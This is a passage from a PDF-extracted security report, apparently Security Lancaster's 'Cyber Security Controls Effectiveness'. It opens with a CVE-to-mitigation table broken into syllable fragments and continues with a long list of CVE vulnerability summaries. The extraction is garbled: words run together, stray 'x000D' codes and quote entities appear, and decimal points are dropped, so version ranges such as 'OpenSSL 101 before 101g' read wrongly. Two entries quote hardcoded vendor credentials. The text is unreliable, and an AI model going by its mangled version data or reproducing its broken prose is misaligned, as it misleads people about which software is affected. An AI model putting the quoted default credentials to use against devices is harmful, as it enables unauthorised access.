edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
